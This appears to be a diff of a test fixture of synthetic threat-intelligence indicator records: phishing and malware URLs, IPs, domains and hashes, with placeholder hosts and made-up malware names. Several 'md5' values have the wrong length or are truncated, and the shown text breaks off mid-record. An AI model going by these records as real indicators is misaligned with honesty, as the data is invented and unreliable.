"severity": "low", "classification": "private", "url": "https://nu3pkz0gp.example.com/ofe/xp4?u06=p1fy", "country": "US", "date_first": "2020-10-09T18:34:43", "detail": "lp1hx7", "lat": 18, "source": "Phony generated indicator", "state": "active", "update_id": 1089556870, "date_last": "2020-10-09T18:34:43", "trusted_circle_ids": "162,568,318", "srcip": "203.0.113.248", "detail2": "imported by user 470", "value_type": "url", "source_feed_id": 603, "id": 3666310702, "maltype": "malware:ggxxp7y", "resource_uri": 
"/api/v1/intelligence/P37597023286/"} -{"confidence": 77, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "84,117,138", "detail": "", "date_first": "2020-10-09T18:34:48", "source": "Phony generated indicator", "state": "active", "update_id": 2784682086, "maltype": "malware:0o15t", "detail2": "imported by user 376", "value_type": "md5", "md5": "5175e79b537c5e4c8fc586506a17d4a08ef72e3d02e0966df92dabe67c3536a5", "source_feed_id": 3656, "id": 2086698854, "date_last": "2020-10-09T18:34:48", "resource_uri": "/api/v1/intelligence/P46901644496/"} -{"confidence": 89, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "19,635", "detail": "", "date_first": "2020-10-09T18:34:53", "source": "Phony generated indicator", "state": "active", "update_id": 3128675349, "maltype": "malware:26jiu2", "detail2": "imported by user 68", "value_type": "md5", "md5": "3aef2087652ab8e68ac26856047aba541618402f", "source_feed_id": 3084, "id": 3363945975, "date_last": "2020-10-09T18:34:53", "resource_uri": "/api/v1/intelligence/P16291577371/"} -{"confidence": 90, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "689,5", "detail": "", "date_first": "2020-10-09T18:34:53", "source": "Phony generated indicator", "state": "active", "update_id": 3111021927, "maltype": "malware:k77uhj1cg", "detail2": "imported by user 959", "value_type": "md5", "md5": "7dc878fb531ddcabbe78970e2a5e7dec16050d97", "source_feed_id": 2797, "id": 2207504395, "date_last": "2020-10-09T18:34:53", "resource_uri": "/api/v1/intelligence/P37532564131/"} -{"confidence": 77, "itype": "phish_url", "severity": "high", "classification": "public", "url": "https://kgb.example.com/otew68s/5rz78r?ld2u5v6oe=qfk", "country": "US", "date_first": "2020-10-09T18:34:54", "detail": "asg", "lat": -89, "source": "Phony generated indicator", "state": "active", "update_id": 3748962180, "date_last": "2020-10-09T18:34:54", 
"trusted_circle_ids": "436", "srcip": "203.0.113.7", "detail2": "imported by user 144", "value_type": "url", "source_feed_id": 2174, "id": 1060878284, "maltype": "malware:eeb8", "resource_uri": "/api/v1/intelligence/P10417746248/"} -{"confidence": 53, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "671,742", "detail": "", "date_first": "2020-10-09T18:34:55", "source": "Phony generated indicator", "state": "active", "update_id": 2408685330, "maltype": "malware:6tvgh", "detail2": "imported by user 76", "value_type": "md5", "md5": "893b6eb682faaa4a5e2df10e0285fa81439a0493fe3a3baea5f1b61609be1683", "source_feed_id": 1089, "id": 3763341250, "date_last": "2020-10-09T18:34:55", "resource_uri": "/api/v1/intelligence/P32928318516/"} -{"confidence": 15, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "741", "detail": "", "date_first": "2020-10-09T18:35:01", "source": "Phony generated indicator", "state": "active", "update_id": 2469286727, "maltype": "malware:ozs8vla", "detail2": "imported by user 794", "value_type": "md5", "md5": "184d266fe8364f81f048d7bb961ec8d8e04d8a2c4855ce26bc8df8d39a5c03e9", "source_feed_id": 1653, "id": 3171501405, "date_last": "2020-10-09T18:35:01", "resource_uri": "/api/v1/intelligence/P13696777986/"} -{"confidence": 61, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "376,145", "detail": "", "date_first": "2020-10-09T18:35:01", "source": "Phony generated indicator", "state": "active", "update_id": 2239822164, "maltype": "malware:qhy", "detail2": "imported by user 243", "value_type": "md5", "md5": "3185888aea88093a8c05acbe10e391a1", "source_feed_id": 1480, "id": 3882686611, "date_last": "2020-10-09T18:35:01", "resource_uri": "/api/v1/intelligence/P45333190544/"} -{"confidence": 7, "itype": "phish_url", "severity": "high", "classification": "public", "url": "http://qshvnx7vp.example.com/ljq/l0i2tg?h8cm3=scs", "country": 
"US", "date_first": "2020-10-09T18:35:04", "detail": "9xu5", "lat": -2, "source": "Phony generated indicator", "state": "active", "update_id": 3756663921, "date_last": "2020-10-09T18:35:04", "trusted_circle_ids": "89", "srcip": "203.0.113.121", "detail2": "imported by user 979", "value_type": "url", "source_feed_id": 3918, "id": 1809518847, "maltype": "malware:6oli4", "resource_uri": "/api/v1/intelligence/P40743258703/"} -{"confidence": 28, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "316,209,234", "detail": "r9b,ykp2g471h", "date_first": "2020-10-09T18:35:06", "source": "Phony generated indicator", "state": "active", "update_id": 1496811209, "maltype": "malware:cuasj", "detail2": "imported by user 42", "value_type": "md5", "md5": "b405905852b96fcafbd9fba750eb226cf6aec873", "source_feed_id": 536, "id": 1429560952, "date_last": "2020-10-09T18:35:06", "resource_uri": "/api/v1/intelligence/P10455681703/"} -{"confidence": 44, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "538", "detail": "", "date_first": "2020-10-09T18:35:22", "source": "Phony generated indicator", "state": "active", "update_id": 3631889422, "maltype": "malware:-gzgl", "detail2": "imported by user 879", "value_type": "md5", "md5": "a73b09a46b54533a3ad55671cedc70c0", "source_feed_id": 2996, "id": 3146369327, "date_last": "2020-10-09T18:35:22", "resource_uri": "/api/v1/intelligence/P38156699638/"} -{"confidence": 6, "itype": "mal_url", "severity": "low", "classification": "public", "url": "http://00969f0-n.example.org/k93fd0h1/nlbju?umv8isd1=nxpec6syr", "country": "US", "date_first": "2020-10-09T18:44:01", "detail": "first_seen=2020-07-02T18:43:33,IP=2001:db8:efcb:7e8d:f286:618a:aa8d:4ea6,35zuzt6,4h0l,mask=192.0.2.185,popularity=high", "lat": 88, "source": "Phony generated indicator", "state": "active", "update_id": 2805015861, "date_last": "2020-10-09T18:44:01", "trusted_circle_ids": "167,928", "srcip": 
"2001:db8:7f90:ceb6:ef35:8bdd:84ea:f342", "detail2": "imported by user 973", "value_type": "url", "source_feed_id": 2355, "id": 1440235585, "maltype": "malware:xex7", "resource_uri": "/api/v1/intelligence/P17911019420/"} -{"confidence": 63, "itype": "phish_url", "severity": "low", "classification": "private", "url": "http://r0i1nfo.example.org/7c6/qpl4?7nbpkro7e=uasv", "country": "US", "date_first": "2020-10-09T18:44:04", "detail": "i969g", "lat": -85, "source": "Phony generated indicator", "state": "active", "update_id": 1378458808, "date_last": "2020-10-09T18:44:04", "trusted_circle_ids": "591", "srcip": "192.0.2.110", "detail2": "imported by user 564", "value_type": "url", "source_feed_id": 2929, "id": 1433458167, "maltype": "malware:i7ht2", "resource_uri": "/api/v1/intelligence/P15808412684/"} -{"confidence": 62, "itype": "mal_domain", "severity": "medium", "classification": "private", "trusted_circle_ids": "837,163,161", "detail": "08dc6,tpf9", "date_first": "2020-10-09T18:44:19", "source": "Phony generated indicator", "state": "active", "update_id": 3546281263, "domain": "vcqa.example.org", "maltype": "malware:b8x26", "detail2": "imported by user 127", "value_type": "domain", "source_feed_id": 1037, "id": 1294078108, "date_last": "2020-10-09T18:44:19", "resource_uri": "/api/v1/intelligence/P45352123315/"} -{"confidence": 48, "itype": "mal_ip", "severity": "medium", "classification": "private", "country": "RU", "date_first": "2020-10-09T18:44:27", "detail": "first_seen=2020-12-11T20:34:53,IP=2001:db8:45b0:47d5:a669:470f:f1c7:98f3,1a9,-t48neqp,mask=203.0.113.103,popularity=high", "lat": -12, "source": "Phony generated indicator", "state": "active", "update_id": 1313784773, "date_last": "2020-10-09T18:44:27", "trusted_circle_ids": "673,824", "srcip": "2001:db8:5f1b:7b08:d21b:a709:c09d:7e6a", "detail2": "imported by user 639", "value_type": "ip", "source_feed_id": 362, "id": 1511418293, "maltype": "malware:5f7fl8", "resource_uri": 
"/api/v1/intelligence/P35745220427/"} -{"confidence": 28, "itype": "phish_url", "severity": "medium", "classification": "private", "url": "https://nvm.example.com/j6c4qca/7cr?l-k=j1mn1atjx", "country": "US", "date_first": "2020-10-09T18:44:35", "detail": "gdhq2ll", "lat": 26, "source": "Phony generated indicator", "state": "active", "update_id": 1497617707, "date_last": "2020-10-09T18:44:35", "trusted_circle_ids": "566,118,724", "srcip": "2001:db8:f5be:6f90:1706:81b0:ff8c:ef43", "detail2": "imported by user 830", "value_type": "url", "source_feed_id": 1272, "id": 3975421809, "maltype": "malware:8s1xc2pux", "resource_uri": "/api/v1/intelligence/P28391706982/"} -{"confidence": 69, "itype": "phish_url", "severity": "high", "classification": "public", "url": "https://lhxu0n.example.com/am4eeouw0/xtjfyuv9k?quwk=w9w51hvm1", "country": "US", "date_first": "2020-10-09T18:44:36", "detail": "vbfuqb4", "lat": -4, "source": "Phony generated indicator", "state": "active", "update_id": 1961553756, "date_last": "2020-10-09T18:44:36", "trusted_circle_ids": "800,165", "srcip": "203.0.113.74", "detail2": "imported by user 45", "value_type": "url", "source_feed_id": 3644, "id": 1443597660, "maltype": "malware:emr5clr", "resource_uri": "/api/v1/intelligence/P30565642492/"} -{"confidence": 10, "itype": "mal_url", "severity": "low", "classification": "public", "url": "https://5uv.example.com/3a3bjy7e0/m61?twlj=e9b", "country": "IN", "date_first": "2020-10-09T18:44:37", "detail": "first_seen=2020-06-11T19:13:54,IP=2001:db8:3736:1dd3:541e:2aff:52c0:2913,bl3l,jxut5e,mask=2001:db8:f42a:81bd:feb1:de48:5295:9624,popularity=high", "lat": 86, "source": "Phony generated indicator", "state": "active", "update_id": 2487763029, "date_last": "2020-10-09T18:44:37", "trusted_circle_ids": "597", "srcip": "203.0.113.101", "detail2": "imported by user 348", "value_type": "url", "source_feed_id": 2960, "id": 2556802895, "maltype": "malware:tqgj2cw", "resource_uri": "/api/v1/intelligence/P27503502122/"} 
-{"confidence": 40, "itype": "phish_url", "severity": "high", "classification": "public", "url": "https://hxb.example.org/wydk7iaq/nl5ei-?m40=ifyub0", "country": "US", "date_first": "2020-10-09T18:44:45", "detail": "rj3", "lat": 25, "source": "Phony generated indicator", "state": "active", "update_id": 2518532305, "date_last": "2020-10-09T18:44:45", "trusted_circle_ids": "902,209,207", "srcip": "2001:db8:58d5:f56d:793f:f377:133a:a157", "detail2": "imported by user 517", "value_type": "url", "source_feed_id": 2954, "id": 2293146712, "maltype": "malware:ullzh-dc", "resource_uri": "/api/v1/intelligence/P26986043169/"} -{"confidence": 100, "itype": "mal_ip", "severity": "low", "classification": "private", "country": "CN", "date_first": "2020-10-09T18:44:47", "detail": "first_seen=2020-11-06T09:05:54,IP=192.0.2.6,zmv,8rc7,mask=203.0.113.29,popularity=low", "lat": 73, "source": "Phony generated indicator", "state": "active", "update_id": 2356107596, "date_last": "2020-10-09T18:44:47", "trusted_circle_ids": "896,971,86", "srcip": "2001:db8:45e:91f2:b85b:f55e:ec:c99b", "detail2": "imported by user 184", "value_type": "ip", "source_feed_id": 1741, "id": 3717183958, "maltype": "malware:qyv3", "resource_uri": "/api/v1/intelligence/P34507990876/"} -{"confidence": 95, "itype": "mal_domain", "severity": "very-high", "classification": "public", "country": "HK", "date_first": "2020-10-09T18:44:50", "detail": "first_seen=2020-01-20T22:15:43,50mk,8hobd4b,mask=2001:db8:3154:1044:aecb:974:a819:db23,popularity=high", "lat": 21, "source": "Phony generated indicator", "state": "active", "update_id": 1102962906, "date_last": "2020-10-09T18:44:50", "domain": "qzn7l7r.example.com", "trusted_circle_ids": "347", "srcip": "192.0.2.162", "detail2": "imported by user 501", "value_type": "domain", "source_feed_id": 204, "id": 3032566612, "maltype": "malware:sqa", "resource_uri": "/api/v1/intelligence/P20301758213/"} -{"confidence": 61, "itype": "mal_url", "severity": "low", "classification": 
"private", "url": "https://9nuct.example.net/4lk8nqz5/kuo9fudzy?zbyr=stin", "trusted_circle_ids": "238,448", "detail": "first_seen=2020-03-21T00:08:51,vf5qs,tr4cn6xm,mask=192.0.2.118,popularity=high", "date_first": "2020-10-09T18:44:50", "source": "Phony generated indicator", "state": "active", "update_id": 1515697097, "maltype": "malware:c4pwz", "detail2": "imported by user 751", "value_type": "url", "source_feed_id": 3273, "id": 3340693286, "date_last": "2020-10-09T18:44:50", "resource_uri": "/api/v1/intelligence/P35426830357/"} -{"confidence": 83, "itype": "phish_url", "severity": "low", "classification": "public", "url": "https://zwi3xpen.example.net/5gbafknb5/uh0?63ockn=muc83xay", "country": "US", "date_first": "2020-10-09T18:44:54", "detail": "mfmbtgkgf", "lat": 79, "source": "Phony generated indicator", "state": "active", "update_id": 3921339680, "date_last": "2020-10-09T18:44:54", "trusted_circle_ids": "237,85,838", "srcip": "203.0.113.96", "detail2": "imported by user 552", "value_type": "url", "source_feed_id": 3329, "id": 3739083046, "maltype": "malware:spzd6p0k-", "resource_uri": "/api/v1/intelligence/P18267744040/"} -{"confidence": 26, "itype": "phish_url", "severity": "very-high", "classification": "public", "url": "https://d12euhi.example.net/urk/c4ehmzh?ed7jn5mc=fw5yh", "country": "US", "date_first": "2020-10-09T18:44:58", "detail": "4dq9lcbg", "lat": -71, "source": "Phony generated indicator", "state": "active", "update_id": 1879291625, "date_last": "2020-10-09T18:44:58", "trusted_circle_ids": "289,915,200", "srcip": "203.0.113.237", "detail2": "imported by user 625", "value_type": "url", "source_feed_id": 2511, "id": 3625463685, "maltype": "malware:kylfp", "resource_uri": "/api/v1/intelligence/P22682684773/"} -{"confidence": 41, "itype": "mal_ip", "severity": "high", "classification": "private", "country": "IN", "date_first": "2020-10-09T18:45:05", "detail": 
"first_seen=2020-06-19T01:55:52,IP=192.0.2.120,wumuemdq7,8vqyydk,mask=192.0.2.216,popularity=high", "lat": -81, "source": "Phony generated indicator", "state": "active", "update_id": 1439822739, "date_last": "2020-10-09T18:45:05", "trusted_circle_ids": "901,40,613", "srcip": "203.0.113.8", "detail2": "imported by user 110", "value_type": "ip", "source_feed_id": 3665, "id": 1735603283, "maltype": "malware:fz-8ge7r", "resource_uri": "/api/v1/intelligence/P33397103833/"} -{"itype": "mal_ip", "classification": "private", "lat": 32, "update_id": 1885802687, "maltype": "malware:8bu7kbgku", "source_feed_id": 2835, "id": 3775312524, "confidence": -1, "severity": "very-high", "trusted_circle_ids": "977,176", "lon": -102, "date_first": "2021-04-07T13:10:07", "source": "Phony generated indicator", "state": "active", "import_session_id": 3288, "value_type": "ip", "srcip": "192.0.2.168", "org": "Level 3 Communications", "asn": "3356", "date_last": "2021-04-19T08:57:46", "country": "US", "detail2": "imported by user 807", "resource_uri": "/api/v1/intelligence/P22317506075/"} -{"confidence": 71, "itype": "apt_ip", "severity": "low", "classification": "private", "trusted_circle_ids": "863", "date_first": "2021-04-29T16:02:17", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 637", "srcip": "192.0.2.89", "update_id": 2953128283, "value_type": "ip", "source_feed_id": 779, "id": 1060450578, "date_last": "2021-04-29T16:02:17", "resource_uri": "/api/v1/intelligence/P34605333513/"} -{"confidence": -1, "itype": "ssh_ip", "severity": "low", "classification": "public", "trusted_circle_ids": "0,356,274", "date_first": "2021-04-29T16:02:23", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 800", "srcip": "203.0.113.234", "update_id": 1775579068, "value_type": "ip", "source_feed_id": 2934, "id": 2510016514, "date_last": "2021-04-29T16:02:23", "resource_uri": "/api/v1/intelligence/P23251399340/"} -{"confidence": 34, 
"itype": "i2p_ip", "severity": "very-high", "classification": "private", "trusted_circle_ids": "884,207", "date_first": "2021-04-29T16:02:24", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 764", "srcip": "192.0.2.234", "update_id": 1042850710, "value_type": "ip", "source_feed_id": 138, "id": 2250119169, "date_last": "2021-04-29T16:02:24", "resource_uri": "/api/v1/intelligence/P17379626790/"} -{"confidence": -1, "itype": "parked_ip", "severity": "very-high", "classification": "private", "trusted_circle_ids": "762,65", "date_first": "2021-04-29T16:02:25", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 297", "srcip": "2001:db8:e4a1:e034:4a78:d136:9737:696b", "update_id": 3793745757, "value_type": "ip", "source_feed_id": 3287, "id": 2828541076, "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P34744569898/"} -{"confidence": 71, "itype": "tor_ip", "severity": "low", "classification": "public", "trusted_circle_ids": "214,141,167", "date_first": "2021-04-29T16:02:25", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 34", "srcip": "2001:db8:2d93:20c1:5b74:1b32:1ef7:fdc4", "update_id": 3282566579, "value_type": "ip", "source_feed_id": 402, "id": 1539625423, "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P42405092601/"} -{"confidence": 73, "itype": "c2_ip", "severity": "medium", "classification": "private", "trusted_circle_ids": "738", "detail": "5kbfbph", "date_first": "2021-04-29T16:02:26", "source": "Phony generated indicator", "state": "active", "update_id": 2203949954, "maltype": "malware:nz184x2", "srcip": "203.0.113.1", "detail2": "imported by user 942", "value_type": "ip", "source_feed_id": 1769, "id": 2667774876, "date_last": "2021-04-29T16:02:26", "resource_uri": "/api/v1/intelligence/P41901040968/"} \ No newline at end of file +{"domain": "d4xgfj.example.net", "itype": "mal_domain", 
"classification": "public", "lat": -49.1, "update_id": 3786618776, "source_feed_id": 3143, "id": 3135167627, "confidence": 20, "severity": "high", "trusted_circle_ids": "122", "lon": 94.4, "date_first": "2020-10-08T12:21:50", "source": "Default Organization", "state": "active", "import_session_id": 1400, "value_type": "domain", "srcip": "89.160.20.156", "org": "OVH Hosting", "date_last": "2020-10-08T12:24:42", "country": "FR", "detail2": "imported by user 184", "resource_uri": "/api/v1/intelligence/P46279656657/"} +{"confidence": 51, "itype": "mal_ip", "severity": "low", "classification": "private", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "RU", "update_id": 3311633654, "lon": -64.7, "id": 2465691587, "source": "Default Organization", "state": "active", "detail2": "imported by user 979", "trusted_circle_ids": "355,386,461", "import_session_id": 1934, "lat": -51.2, "org": "IP Khnykin Vitaliy Yakovlevich", "value_type": "ip", "source_feed_id": 639, "date_first": "2020-10-08T12:21:59", "date_last": "2020-10-08T12:24:42", "resource_uri": "/api/v1/intelligence/P26893014825/"} +{"itype": "mal_ip", "classification": "public", "lat": 38.4, "update_id": 1860329541, "source_feed_id": 2564, "date_first": "2020-10-08T12:22:11", "confidence": 24, "severity": "high", "trusted_circle_ids": "954,740", "lon": 0.0, "id": 1886961414, "source": "Default Organization", "state": "active", "import_session_id": 3569, "value_type": "ip", "srcip": "192.168.2.8", "org": "Cox Communications", "asn": "22773", "date_last": "2020-10-08T12:24:42", "country": "US", "detail2": "imported by user 830", "resource_uri": "/api/v1/intelligence/P16938191113/"} +{"confidence": 56, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "439,942,801", "id": 1785659799, "source": "Default Organization", "state": "active", "detail2": "imported by user 723", "import_session_id": 244, "update_id": 3898969521, "value_type": "md5", "resource_uri": 
"/api/v1/intelligence/P44706407813/", "source_feed_id": 3759, "date_first": "2020-10-08T12:22:16", "date_last": "2020-10-08T12:24:42", "md5": "6466e2"} +{"itype": "mal_ip", "classification": "private", "lat": -64.8, "update_id": 1925356831, "source_feed_id": 1834, "date_first": "2020-10-08T12:28:50", "confidence": 61, "severity": "very-high", "trusted_circle_ids": "310,709,553", "lon": -129.3, "id": 2788278724, "source": "Default Organization", "state": "active", "import_session_id": 3146, "value_type": "ip", "srcip": "192.168.2.235", "org": "Spectrum", "asn": "20001", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 16", "resource_uri": "/api/v1/intelligence/P39996084337/"} +{"itype": "mal_ip", "classification": "public", "lat": 72.1, "update_id": 1327494837, "source_feed_id": 2122, "date_first": "2020-10-08T12:29:01", "confidence": 31, "severity": "low", "trusted_circle_ids": "811,297", "lon": -52.2, "id": 2979716207, "source": "Default Organization", "state": "active", "import_session_id": 2369, "value_type": "ip", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "org": "Spectrum", "asn": "11351", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 659", "resource_uri": "/api/v1/intelligence/P24601068254/"} +{"confidence": 72, "itype": "c2_domain", "severity": "very-high", "classification": "private", "srcip": "89.160.20.156", "trusted_circle_ids": "238,259,537", "update_id": 1356750652, "detail": "3vzmr9,Botnet-VXPC5QK8T,popularity=high,type=2,first_seen=2020-07-24T07:36:41,Botnet-1QZ2U,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=high,threat=jn4", "id": 3763825895, "source": "Default Organization", "state": "active", "detail2": "imported by user 50", "domain": "ei1im6skd.example.com", "lat": 85.1, "maltype": "malware:r47agu9", "value_type": "domain", "source_feed_id": 967, "date_first": "2020-10-09T18:14:43", "date_last": "2020-10-09T18:14:43", "resource_uri": 
"/api/v1/intelligence/P49850231022/"} +{"confidence": 60, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "455,761,112", "id": 3178646499, "source": "Default Organization", "state": "active", "detail2": "imported by user 167", "update_id": 1585930018, "value_type": "md5", "resource_uri": "/api/v1/intelligence/P35792781031/", "source_feed_id": 1743, "date_first": "2020-10-09T18:30:10", "date_last": "2020-10-09T18:30:10", "md5": "0f321db9"} +{"confidence": 70, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2070423140, "detail": "jn5jpvg", "id": 2435568409, "source": "Default Organization", "state": "active", "detail2": "imported by user 654", "url": "https://ax1a6o38z.example.org/enec3i/f1n8fv?4shpqq9=fbo9osx8p", "trusted_circle_ids": "633,641", "lat": -26.2, "maltype": "malware:9rb9", "value_type": "url", "source_feed_id": 3940, "date_first": "2020-10-09T18:30:13", "date_last": "2020-10-09T18:30:13", "resource_uri": "/api/v1/intelligence/P41264495308/"} +{"confidence": 35, "itype": "mal_url", "severity": "low", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "CN", "update_id": 2151391711, "detail": "7zhsn5t7,xl4", "id": 1404936664, "source": "Default Organization", "state": "active", "detail2": "imported by user 81", "url": "https://beko3.example.com/vkelnz/jdz6zf-ga?g39fu=88309ge", "trusted_circle_ids": "718,424", "lat": -55.3, "maltype": "malware:4p1lc0bf", "value_type": "url", "source_feed_id": 2236, "date_first": "2020-10-09T18:30:13", "date_last": "2020-10-09T18:30:13", "resource_uri": "/api/v1/intelligence/P22799247040/"} +{"confidence": 7, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "812", "update_id": 1852221746, "detail": "aampq5,d6-", "id": 1300368058, "source": "Default Organization", "state": "active", "detail2": "imported by user 993", 
"maltype": "malware:s7-t", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P43593676062/", "source_feed_id": 1581, "date_first": "2020-10-09T18:30:22", "date_last": "2020-10-09T18:30:22", "md5": "b91c"} +{"confidence": 63, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "29,879,537", "update_id": 3048270616, "detail": "", "id": 1511736215, "source": "Default Organization", "state": "active", "detail2": "imported by user 963", "maltype": "malware:0vnvp84", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P47666251160/", "source_feed_id": 1695, "date_first": "2020-10-09T18:30:23", "date_last": "2020-10-09T18:30:23", "md5": "3c49c"} +{"confidence": 95, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "192.168.2.162", "country": "US", "update_id": 2851232102, "detail": "22nciqjs", "id": 2213035853, "source": "Default Organization", "state": "active", "detail2": "imported by user 302", "url": "http://sevs82.example.com/c5-d/hdajog?4rs78hl=wvwi", "trusted_circle_ids": "766,154", "lat": -12.8, "maltype": "malware:25iv", "value_type": "url", "source_feed_id": 787, "date_first": "2020-10-09T18:30:30", "date_last": "2020-10-09T18:30:30", "resource_uri": "/api/v1/intelligence/P11608678465/"} +{"confidence": 18, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "6,539", "update_id": 2328838402, "detail": "vnx4nu7c,26sg-3-", "id": 2594216423, "source": "Default Organization", "state": "active", "detail2": "imported by user 548", "maltype": "malware:i6z9qr", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P32471582403/", "source_feed_id": 1475, "date_first": "2020-10-09T18:30:37", "date_last": "2020-10-09T18:30:37", "md5": "e29608b"} +{"confidence": 54, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "762", "update_id": 1784507596, "detail": "", "id": 1133111133, "source": "Default 
Organization", "state": "active", "detail2": "imported by user 438", "maltype": "malware:4rs9qpc1", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P20539380512/", "source_feed_id": 3600, "date_first": "2020-10-09T18:30:40", "date_last": "2020-10-09T18:30:40", "md5": "c38d2e6d"} +{"confidence": 78, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "751", "update_id": 2343991526, "detail": "ica,8ahl", "id": 2543010039, "source": "Default Organization", "state": "active", "detail2": "imported by user 690", "maltype": "malware:ghdl7nwwq", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P16167095005/", "source_feed_id": 926, "date_first": "2020-10-09T18:30:45", "date_last": "2020-10-09T18:30:45", "md5": "67808c"} +{"confidence": 0, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "519,390,909", "update_id": 3008175946, "detail": "iop,gyu-", "id": 3233930917, "source": "Default Organization", "state": "active", "detail2": "imported by user 517", "maltype": "malware:m5pk44o", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15758111412/", "source_feed_id": 2010, "date_first": "2020-10-09T18:30:54", "date_last": "2020-10-09T18:30:54", "md5": "efa99"} +{"confidence": 34, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "109,718,621", "update_id": 2404949482, "detail": "", "id": 1777540600, "source": "Default Organization", "state": "active", "detail2": "imported by user 303", "maltype": "malware:-fesxy", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P13990676648/", "source_feed_id": 3201, "date_first": "2020-10-09T18:30:59", "date_last": "2020-10-09T18:30:59", "md5": "e8c1"} +{"confidence": 15, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "559", "update_id": 3529199846, "detail": "", "id": 2796250594, "source": "Default Organization", "state": "active", 
"detail2": "imported by user 219", "maltype": "malware:c1b7kt7", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P13506696048/", "source_feed_id": 3205, "date_first": "2020-10-09T18:31:10", "date_last": "2020-10-09T18:31:10", "md5": "be24"} +{"confidence": 56, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "190,495,959", "update_id": 3510871820, "detail": "", "id": 2310429917, "source": "Default Organization", "state": "active", "detail2": "imported by user 762", "maltype": "malware:slwl", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P35629727989/", "source_feed_id": 885, "date_first": "2020-10-09T18:31:16", "date_last": "2020-10-09T18:31:16", "md5": "a2678fc"} +{"confidence": 11, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "454,562", "update_id": 3756244435, "detail": "", "id": 2853859039, "source": "Default Organization", "state": "active", "detail2": "imported by user 616", "maltype": "malware:voc", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P39948074871/", "source_feed_id": 586, "date_first": "2020-10-09T18:31:22", "date_last": "2020-10-09T18:31:22", "md5": "2ee715a9b"} +{"confidence": 51, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "846,362", "update_id": 1410682100, "detail": "gcgm1we6l,etukwxhs,g0vc9,mask=89.160.20.156,threat=bm-uj8c12", "id": 2328858169, "source": "Default Organization", "state": "active", "detail2": "imported by user 510", "maltype": "malware:yuq33pg5", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P30902643017/", "source_feed_id": 826, "date_first": "2020-10-09T18:31:27", "date_last": "2020-10-09T18:31:27", "md5": "e1df8d"} +{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "305", "update_id": 1592676961, "detail": "", "id": 1145199430, "source": "Default Organization", "state": 
"active", "detail2": "imported by user 14", "maltype": "malware:qc6c9qt", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P14842247088/", "source_feed_id": 1793, "date_first": "2020-10-09T18:31:29", "date_last": "2020-10-09T18:31:29", "md5": "9006d07f"} +{"confidence": 2, "itype": "phish_url", "severity": "high", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2718905308, "detail": "g1wn0g", "id": 1726466938, "source": "Default Organization", "state": "active", "detail2": "imported by user 600", "url": "http://faahk3drf.example.net/julf98x5/0g1t8f?cbffxs2qv=vwgz", "trusted_circle_ids": "553", "lat": 47.7, "maltype": "malware:t52oo3", "value_type": "url", "source_feed_id": 1965, "date_first": "2020-10-09T18:31:34", "date_last": "2020-10-09T18:31:34", "resource_uri": "/api/v1/intelligence/P39735553093/"} +{"confidence": 71, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "866", "update_id": 2310970191, "detail": "pzs4xlqy,6rblg", "id": 1457264389, "source": "Default Organization", "state": "active", "detail2": "imported by user 976", "maltype": "malware:nx1qwwprl", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P20794801988/", "source_feed_id": 1437, "date_first": "2020-10-09T18:31:36", "date_last": "2020-10-09T18:31:36", "md5": "f5d"} +{"confidence": 70, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "70,68,789", "update_id": 1487534287, "detail": "", "id": 3532094043, "source": "Default Organization", "state": "active", "detail2": "imported by 